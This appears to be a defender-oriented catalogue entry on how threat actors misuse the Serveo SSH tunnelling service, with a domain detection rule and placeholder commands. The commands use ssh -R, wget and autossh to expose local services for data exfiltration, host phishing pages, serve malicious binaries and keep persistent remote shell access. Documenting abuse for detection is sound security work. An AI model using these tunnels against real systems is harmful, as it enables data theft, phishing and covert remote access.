.. /Serveo
Star

Serveo is an online free alternate to ngrok. Which can be used by the insiders as well as threat actors to expose local systems, services over the internet for data exfiltrations, downloading malicious softwares as well as hosting phishing pages.

Paths:

Execution via command line. No need of installation.

Resources:

https://serveo.net/

Acknowledgements:

Kamran Saifullah (@deFr0ggy)

Detections:

Domain: *.serveo.net

Exfiltration

The command creates a tunnel via serveo to the local port provided in the command. This can be a local service or a web server running locally.
```
ssh -R <PORT>:localhost:<PORT> serveo.net
```
Use case
Exposing local services/file system over the internet for data exfiltration.

Privileges required
User

Operating systems
Windows, Mac, Linux

Download

Threat actors can host malicious binaries on the local system and expose it via serveo.net and have those downloaded on the compromised host.
```
wget *.serveo.net
```
Use case
Serving malicious binaries to be executed/downloaded on the compromised host.

Privileges required
User

Operating systems
Windows, Mac, Linux

Phishing

Threat actors can host phishing sites locally and can expose them via serveo.net to compromise users.
```
ssh -R <PORT>:localhost:<PORT> serveo.net
```
Use case
Hosting phishing site locally and exposing it via serveo.net

Privileges required
User

Operating systems
Windows, Mac, Linux

Shell Access

Threat actors enabling persistence on the compromised host to ensure system automatically gets connected to the serveo.net and can also provide shell access by exposing SSH/RDP etc.
```
autossh -M 0 -R <PORT>:localhost:<PORT> serveo.net
```
Use case
Persisting local connections over serveo.net and/or exposing SSH/RDP for persistence.

Privileges required
User

Operating systems
Windows, Mac, Linux